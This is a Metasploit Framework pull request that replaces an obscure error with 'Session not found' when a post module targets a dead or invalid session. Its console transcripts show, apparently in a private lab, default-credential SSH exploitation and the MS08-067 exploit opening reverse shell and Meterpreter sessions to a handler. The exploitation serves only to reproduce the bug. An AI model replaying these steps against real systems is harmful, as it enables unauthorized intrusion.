### PR TITLE
Fix invalid session ID bug

### DIFF
--- a/lib/msf/base/simple/post.rb
+++ b/lib/msf/base/simple/post.rb
@@ -93,19 +93,18 @@ protected
   #
   def self.job_run_proc(ctx)
     mod = ctx[0]
-    sid = mod.datastore["SESSION"]
     begin
       mod.setup
       mod.framework.events.on_module_run(mod)
       # Grab the session object since we need to fire an event for not
       # only the normal module_run event that all module types have to
       # report, but a specific event for sessions as well.
-      s = mod.framework.sessions.get(sid)
+      s = mod.framework.sessions.get(mod.datastore["SESSION"])
       if s
         mod.framework.events.on_session_module_run(s, mod)
         mod.run
       else
-        mod.print_error("Invalid session ID: #{sid}")
+        mod.print_error("Session not found")
         mod.cleanup
         return
       end

--- a/lib/msf/base/simple/post.rb
+++ b/lib/msf/base/simple/post.rb
@@ -89,7 +89,7 @@ protected
   #
   # Job run proc, sets up the module and kicks it off.
   #
-  # XXX: Mostly Copy/pasted from simple/auxiliarly.rb
+  # XXX: Mostly Copy/pasted from simple/auxiliary.rb
   #
   def self.job_run_proc(ctx)
     mod = ctx[0]
@@ -141,7 +141,7 @@ protected
   #
   # Clean up the module after the job completes.
   #
-  # Copy/pasted from simple/auxiliarly.rb
+  # Copy/pasted from simple/auxiliary.rb
   #
   def self.job_cleanup_proc(ctx)
     mod = ctx[0]


### PR DESCRIPTION
cc @jvazquez-r7, @zeroSteiner

Discovered this bug a little while ago when I tried to run a post module on a session that had died. The bug resurfaced in #2952.

From our very own PSO Pete:

```
09:45 <Pete> so this what I would see.
09:46 <Pete> I have 100 + shellz. One dies I dont know it and I try to run a post mod on it. I get this error.
09:46 <Pete> I look at my sessions and say WTF. Then try to debug it.
```

IMHO, it's better to present an appropriate error message than to raise an obscure one somewhere else in Framework.

On `master`:

```
wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qr beug.rc
[*] Processing beug.rc for ERB directives.
resource (beug.rc)> use exploit/multi/ssh/sshexec
resource (beug.rc)> set RHOST 172.16.126.129
RHOST => 172.16.126.129
resource (beug.rc)> set USERNAME msfadmin
USERNAME => msfadmin
resource (beug.rc)> set PASSWORD msfadmin
PASSWORD => msfadmin
resource (beug.rc)> exploit
[*] Started reverse handler on 172.16.126.1:4444
[*] 172.16.126.129:22 - Sending Bourne stager...
[*] Command Stager progress -  50.18% done (428/853 bytes)
[*] Command Stager progress - 100.00% done (853/853 bytes)
[*] Command shell session 1 opened (172.16.126.1:4444 -> 172.16.126.129:49155) at 2014-02-11 17:16:54 -0600

^Z
Background session 1? [y/N]  y
resource (beug.rc)> use exploit/windows/smb/ms08_067_netapi
resource (beug.rc)> set RHOST 172.16.126.128
RHOST => 172.16.126.128
resource (beug.rc)> exploit
[*] Started reverse handler on 172.16.126.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769024 bytes) to 172.16.126.128
[*] Meterpreter session 2 opened (172.16.126.1:4444 -> 172.16.126.128:1087) at 2014-02-11 17:17:03 -0600

meterpreter >
Background session 2? [y/N]
resource (beug.rc)> use post/windows/gather/checkvm
resource (beug.rc)> run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
resource (beug.rc)> set SESSION 1337
SESSION => 1337
resource (beug.rc)> run

[-] Post failed: ArgumentError Missing required option :session
[-] Call stack:
[-]   /home/wvu/metasploit-framework/lib/msf/core/db.rb:870:in `report_session_event'
[-]   /home/wvu/metasploit-framework/lib/msf/core/framework.rb:442:in `on_session_module_run'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:181:in `each'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:181:in `method_missing'
[*] Post module execution completed
resource (beug.rc)> set SESSION -1
SESSION => -1
resource (beug.rc)> run
[*] Checking if WVU-26C2C72DDEA is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*] Post module execution completed
resource (beug.rc)> set SESSION 2
SESSION => 2
resource (beug.rc)> run
[*] Checking if WVU-26C2C72DDEA is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*] Post module execution completed
resource (beug.rc)> sessions -k 2
[*] Killing session 2
[*] 172.16.126.128 - Meterpreter session 2 closed.
resource (beug.rc)> run
[-] Post failed: ArgumentError Missing required option :session
[-] Call stack:
[-]   /home/wvu/metasploit-framework/lib/msf/core/db.rb:870:in `report_session_event'
[-]   /home/wvu/metasploit-framework/lib/msf/core/framework.rb:442:in `on_session_module_run'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:181:in `each'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:181:in `method_missing'
[*] Post module execution completed
resource (beug.rc)> sessions -K
[*] Killing all sessions...
[*] 172.16.126.129 - Command shell session 1 closed.
resource (beug.rc)> set SESSION -1
SESSION => -1
resource (beug.rc)> run
[-] Post failed: ArgumentError Missing required option :session
[-] Call stack:
[-]   /home/wvu/metasploit-framework/lib/msf/core/db.rb:870:in `report_session_event'
[-]   /home/wvu/metasploit-framework/lib/msf/core/framework.rb:442:in `on_session_module_run'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:181:in `each'
[-]   /home/wvu/metasploit-framework/lib/msf/core/event_dispatcher.rb:181:in `method_missing'
[*] Post module execution completed
resource (beug.rc)> workspace -d default
[*] Deleted and recreated the default workspace
resource (beug.rc)> exit -y
wvu@kharak:~/metasploit-framework:master$
```

This PR:

```
wvu@kharak:~/metasploit-framework:beug/session$ ./msfconsole -qr beug.rc
[*] Processing beug.rc for ERB directives.
resource (beug.rc)> use exploit/multi/ssh/sshexec
resource (beug.rc)> set RHOST 172.16.126.129
RHOST => 172.16.126.129
resource (beug.rc)> set USERNAME msfadmin
USERNAME => msfadmin
resource (beug.rc)> set PASSWORD msfadmin
PASSWORD => msfadmin
resource (beug.rc)> exploit
[*] Started reverse handler on 172.16.126.1:4444
[*] 172.16.126.129:22 - Sending Bourne stager...
[*] Command Stager progress -  50.18% done (428/853 bytes)
[*] Command Stager progress - 100.00% done (853/853 bytes)
[*] Command shell session 1 opened (172.16.126.1:4444 -> 172.16.126.129:49156) at 2014-02-11 17:17:49 -0600

^Z
Background session 1? [y/N]  y
resource (beug.rc)> use exploit/windows/smb/ms08_067_netapi
resource (beug.rc)> set RHOST 172.16.126.128
RHOST => 172.16.126.128
resource (beug.rc)> exploit
[*] Started reverse handler on 172.16.126.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769024 bytes) to 172.16.126.128
[*] Meterpreter session 2 opened (172.16.126.1:4444 -> 172.16.126.128:1088) at 2014-02-11 17:18:02 -0600

meterpreter >
Background session 2? [y/N]
resource (beug.rc)> use post/windows/gather/checkvm
resource (beug.rc)> run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
resource (beug.rc)> set SESSION 1337
SESSION => 1337
resource (beug.rc)> run

[-] Session not found
[*] Post module execution completed
resource (beug.rc)> set SESSION -1
SESSION => -1
resource (beug.rc)> run
[*] Checking if WVU-26C2C72DDEA is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*] Post module execution completed
resource (beug.rc)> set SESSION 2
SESSION => 2
resource (beug.rc)> run
[*] Checking if WVU-26C2C72DDEA is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*] Post module execution completed
resource (beug.rc)> sessions -k 2
[*] Killing session 2
[*] 172.16.126.128 - Meterpreter session 2 closed.
resource (beug.rc)> run
[-] Session not found
[*] Post module execution completed
resource (beug.rc)> sessions -K
[*] Killing all sessions...
[*] 172.16.126.129 - Command shell session 1 closed.
resource (beug.rc)> set SESSION -1
SESSION => -1
resource (beug.rc)> run
[-] Session not found
[*] Post module execution completed
resource (beug.rc)> workspace -d default
[*] Deleted and recreated the default workspace
resource (beug.rc)> exit -y
wvu@kharak:~/metasploit-framework:beug/session$
```

Verification steps:
- [ ] Run a post module against a nonexistent session
- [ ] Verify that you see the appropriate error message

`beug.rc` here: https://gist.github.com/wvu-r7/8947368.
